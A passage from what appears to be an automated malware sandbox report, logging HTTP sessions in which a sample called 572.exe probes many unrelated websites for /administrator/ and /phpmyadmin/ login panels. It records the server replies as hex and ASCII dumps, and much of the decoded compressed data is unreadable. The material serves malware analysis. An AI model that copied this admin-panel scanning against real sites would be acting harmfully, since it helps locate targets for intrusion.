                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                208192.168.2.65523264.190.63.11180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.354990005 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.563971043 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.598057985 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://foros.net/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.806505919 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                209192.168.2.65535747.251.24.18880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.355262995 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.540885925 CET355INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://cjdropshipping.com/administrator
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.657588005 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.843142033 CET365INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://cjdropshipping.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                210192.168.2.655803192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.459000111 CET175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639163017 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=9726ade2ef560c0dc5240a8df153057b; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 34 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 73 23 c9 95 25 f8 b9 d2 6c ff 83 57 c8 5a 95 39 4a 0f 84 3f c3 a3 8a a0 4c 55 ad de ee b1 66 8f 4c 8f 69 5b 53 c9 c6 40 20 92 88 aa 20 40 00 41 30 49 a9 fe fb 9e 73 3d 00 46 b2 52 a5 ec 69 cd ec ae d9 a6 31 1d 37 dc ef e3 dc 73 ce c5 e7 ff f8 df be f9 fd ff f5 9b 5f ab f5 70 db 5f be ba e0 8f ea 17 9b 9b 79 d1 6e f4 1f 7e 57 a8 65 bf 38 1c e6 c5 66 ab bf 3b 28 9c 87 e3 4d c1 c4 76 b1 c2 cf 6d 3b 2c d4 72 bd d8 1f da 61 5e fc e1 f7 ff a4 53 71 ba de 2c 6e db 79 71 ec da 87 bb ed 7e 40 a7 ed 66 68 37 48 7b e8 56 c3 7a be 6a 8f dd b2 d5 f2 f1 56 75 9b 6e e8 16 bd 3e 2c 17 7d 3b 37 6c d2 77 9b ef d5 be ed e7 c5 dd 7e fb ae eb db 42 ad f7 ed bb 79 31 9b dd dc de dd 94 db fd cd ec fd bb cd cc 30 fb d5 c5 61 b9 ef ee 86 cb d7 ef ee 37 cb a1 db 6e 5e 73 97 37 7f e6 59 ca 12 ff 06 3c 6a ae 3e bc 28 f7 ed 5d bf 58 b6 af 67 df 5e cb 8e df 5e cf de 7e f1 dd e1 8b 37 3f bc 79 bd da 2e ef 6f 01 b9 3c 05 bf ee 5b fe bc f9 ea 62 36 8e 7b 75 31 74 43 df 5e 5e dd f7 43 a7 fe 65 d5 2e 0e ea e7 3f 4b d6 98 af d4 7f bd 3f 0c 6a b1 d9 0e eb 76 af fe 7d bb 5f fd 66 df 1e 0e ea d0 0d ed c5 2c 97 4d b6 fc 62 b5 39 e8 3b 2c d8 0e cb f5 17 79 d5 2f 66 b3 77 60 ed 50 de 6c b7 37 7d bb b8 eb 0e e5 72 7b fb 85 9a 7d 42 e5 a1 7c 20 47 93 e4 17 3d 0f c3 62 e8 96 b9 e1 72 bf 3d 1c b6 fb ee a6 db e4 9e e8 07 c1 36 ed 72 78 31 ad 58 f4 43 bb df 2c 06 e8 31 3c de 41 e2 c5 dd 5d df 2d 17 24 7d b6 3f 1c 7e f1 fe b6 c7 13 f7 9b 17 1f f0 b2 5f ec ee b7 5f a9 7f 6a db d5 b3 96 b7 cc e8 98 40 24 b3 6e b3 6a df 97 77 eb bb d9 3b a4 cd 8a bf f7 f0 6f b6 b7 94 f0 f0 a9 28 96 63 fe 14 ce e7 5a ab df af bb 2c a5 ba 3f b4 07 05 8d d5 ff 29 22 a9 5f 6d 16 fd 23 88 3d a8 eb 47 75 b5 dd 1c 80 f8 5f 36 87 ee 66 8d a9 77 fd 3d 29 3e d6 65 5d 1a a5 d5 1f 0e dd e6 66 52 32 ec 17 cb ef 79 a5 d5 6c f6 f0 f0 50 de e6 06 dd d8 40 d0 29 ad 2f ff 8f 0c e3 df b6 43 fb e5 8f a6 00 1a 6c a7 96 f7 fb 3d b0 f7 8f 0a 52 be eb 6e ee f7 ed 4a 6d 37 00 3b 62 2f b1 46 9b b7 d8 3e 6c e0 d2 0d 96 04 88 ad 5a dc 63 a3 cd 40 66 5b f5 d0 0d eb 1f 6f d7 6d 64 eb 97 b3 0f ed 30 60 01 ac ba d8 b4 7d 49 ac 27 a8 ea 0f bf 02 92 55 cb 9c c9 0e b3 4f 62 4e f2 3f fb ec e2 b0 dc 77 77 c3 a8 fe d0 be 1f 66 df 2d 8e 8b 7c 5b 5c 22 e3 b3 07 a8 b7 7d 28 ff c7 c3 5d 7b bb fd ae fb dd 09 d0 5c fd b9 b8 5e 1c da 3f ec fb e2 cb 62 3d 0c 77 87 2f bf 9d 7d 3b 3b 94 0f e5 76 7f f3 ed ac bb 5d dc b4 87 6f a1 f9 be fd 76 26 c5 df ce 8c 29 6d 59 7d 3b ab ed fb da 7e 3b 2b de 16 98 89 fa f2 6e 73 83 8f c3 f1 e6 7f ae 1f 0a a5 1b 7e 7f 9d 1b 22 e2 f7 f6 7e bf 6c 8b 2f ff 5c 40 34 d2 cf b2 b1 bf b4 ff d0 aa df ce 1e ee 74 b7 59 f6 f7 2b 8e fa ee 20 17 52 a4 f7 6d 8f ac b6 bc ed 36 e5 77 87 5f 1e db fd 3c 94 a6 34 c5 0f 3f 7c 45 a2 3e 7f 77 bf 59 0e dd 76 f3 7a f1 f6 fa ed f2 cd 9f 4f df 6a c5 9b 37 7f 3e 2e f6 6a 39 ff dd 00 fb dd 94 ef f6 db db 6f d6 8b fd 37 50 f0 ab be 5c a2 f7 fe b7 ed 72 78 5d bd ad de 7e 5f 3e 74 ab
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 413ks#%lWZ9J?LUfLi[S@ @A0Is=FRi17s_p_yn~We8f;(Mvm;,ra^Sq,nyq~@fh7H{VzjVun>,};7lw~By10a7n^s7Y<j>(]Xg^^~7?y.o<[b6{u1tC^^Ce.?K?jv}_f,Mb9;,y/fw`Pl7}r{}B| G=br=6rx1XC,1<A]-$}?~__j@$njw;o(cZ,?)"_m#=Gu_6fw=)>e]fR2ylP@)/Cl=RnJm7;b/F>lZc@f[omd0`}I'UObN?wwf-|[\"}(]{\^?b=w/};;v]ov&)mY};~;+ns~"~l/\@4tY+ Rm6w_<4?|E>wYvzOj7>.j9o7P\rx]~_>t
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639240980 CET1286INData Raw: 61 8d df 75 4b bd de bc ed cb 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 0d 0a 31 61 34 65 0d 0a 15 db
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: auKw]d^5}v{5~z=o=v1a4eWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639259100 CET1286INData Raw: db 2c fb fb 55 2b e3 be db dd b7 fb c7 f1 e7 34 16 12 db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,U+40=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCptA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639293909 CET1286INData Raw: d8 bc 3c 4f ca 4c ff 35 05 70 9d d7 3a 93 92 37 ff b1 3e d2 70 5c 5a 7e 3f ca 37 dc 94 2f 0f cb 7d 77 37 a8 e1 f1 ae 9d 7f 31 b4 ef 87 d9 77 8b e3 22 df 7e 71 f9 6a f6 5f d4 c5 e7 7f fc e6 1f 7f f5 fb 5f fd 51 fd 97 d9 ab e3 62 af 86 07 b4 7e 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <OL5p:7>p\Z~?7/}w71w"~qj__Qb~<Gw=j\8oF-:Q<<}w-b-[}jno-."|[#-/z3@ogtYw.,/Prlv{]jr==^P4p}w
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639309883 CET1286INData Raw: 0e a6 9e a7 63 07 99 b8 e3 10 80 ad a6 30 86 4f c7 b1 33 f4 26 48 39 f7 c4 fb 79 98 e0 49 f4 a4 32 b1 f4 b6 39 52 d8 86 62 b2 69 10 39 6b 83 b6 b6 0a 9c da 00 2a 2c 15 ec 5a 9b a6 4c a1 26 3e e0 17 7c 55 45 a7 61 1c 6d 17 6c 8d 09 36 1c 0d 1e 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: c0O3&H9yI29Rbi9k*,ZL&>|UEaml6LuL4,zKL(pd9f%4q^b1<9uru*c>Dsv&g'|E!UNgeZSy>:q*Alaaa;;h|C.XXF.J
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639326096 CET1286INData Raw: 20 bf 93 e5 f1 83 4f da 2c 51 71 60 18 cd 6e 65 19 43 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: O,Qq`neCIU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-k
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639342070 CET386INData Raw: 8a 22 32 81 05 d8 7c d0 f2 93 95 db e1 a5 a1 41 f3 65 ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "2|Aeu,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSY
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639358044 CET1286INData Raw: 35 61 63 0d 0a eb d3 d3 15 f8 a8 4b 6f a1 5f c3 1f 70 90 bd c7 9c 06 bb 57 06 dc cb 8f 92 ab 67 32 25 0f 64 ca 63 ce 1f f2 4f be 82 bf c7 96 a7 d4 e7 b7 61 52 74 32 c5 98 a4 26 c3 86 09 8a a7 e2 f2 62 76 b7 18 d6 97 af 2e 66 87 c7 db eb 6d 8f 28
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 5acKo_pWg2%dcOaRt2&bv.fm([ne=:vb-j`l+d2~r102Pr1rCxKp{sZ0<?CU*:S>N?4eM
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639374971 CET1286INData Raw: 9f c6 a1 2d 57 ab 8d cf 7d 77 da 8b 1b 0d 29 d0 51 ac e2 cb 26 84 81 66 36 51 27 4e 84 a5 5d 59 a3 41 d6 27 92 c9 c1 0b 22 39 95 dc 68 79 7d ba 0a b2 82 35 65 93 ec 4e 28 d6 32 eb 7c 82 3b 7d 52 37 bf 66 70 95 8b f9 e6 bc 73 3e 6d 46 2b 12 98 aa
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -W}w)Q&f6Q'N]YA'"9hy}5eN(2|;}R7fps>mF+h4hg-yqjgS<C:)|%got:;g1s*Q_&eMyK>]2S|V=Sb63$_I|"G1-6hy4',@U?]5B&%#
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639393091 CET1286INData Raw: 53 ec 8d 11 3f 8c 4b 36 ee a8 03 45 d9 c9 47 be 52 93 67 95 cb 2b 35 69 f3 74 65 1d 6b 64 9e b3 47 a4 5b b3 86 c4 b1 aa 8f 5a be 76 d5 d9 36 d9 03 88 47 3a 25 7e ba 8a 34 b7 32 89 c0 d7 a6 6c 8c 39 b2 43 dd ac 01 08 f4 1e f3 07 dc 53 87 a3 11 9b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: S?K6EGRg+5itekdG[Zv6G:%~42l9CSNite2)"F3GQ6SV&Dvd>3sY:bgxp>M1T212CM!lo,dL9jW9'cItc9 p$-aw36PJR/wc!
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.741106987 CET1286INData Raw: ee 91 41 b1 3a b7 1b f2 8f dc ec 72 ea b8 e3 a4 df 30 89 77 b9 83 74 53 cf b5 c3 73 cb dd a4 5e 4d 20 0c 13 6c bb 5c 9f b7 7b de 65 78 5e 71 97 eb 27 bb e5 5e 4f c5 e5 c5 ec 6e 31 ac 2f 5f 5d cc 0e 8f b7 d7 db 1e 51 0e 54 b7 9a 17 dd 72 bb d1 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: A:r0wtSs^M l\{ex^q'^On1/_]QTrnP}z~^TYpMPxe1=E%2:8T g94>V'O1'_O:y&Etelmin3R9SMnG7c).oIzKMzX)


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                211192.168.2.65584231.13.65.780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.500289917 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.602051020 CET214INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                212192.168.2.655394172.66.43.6480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.508348942 CET187OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nuevopacto.runacode.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.637916088 CET657INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://nuevopacto.runacode.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eKKCiUBoVIEqO5PFJu0kKDThamSW74w6ijIrBbtE7dVz3ckOJ9wqeqkI9CrBmcbig%2FzR5tP2ft%2FKcoc2BuCfXgKw2MFQIajXFyeRGKq64CmPRrxjZvn03G5EQcJP4IvWsOQwBIN5SYUO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7049ed244e-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.920079947 CET196OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nuevopacto.runacode.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.046322107 CET668INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
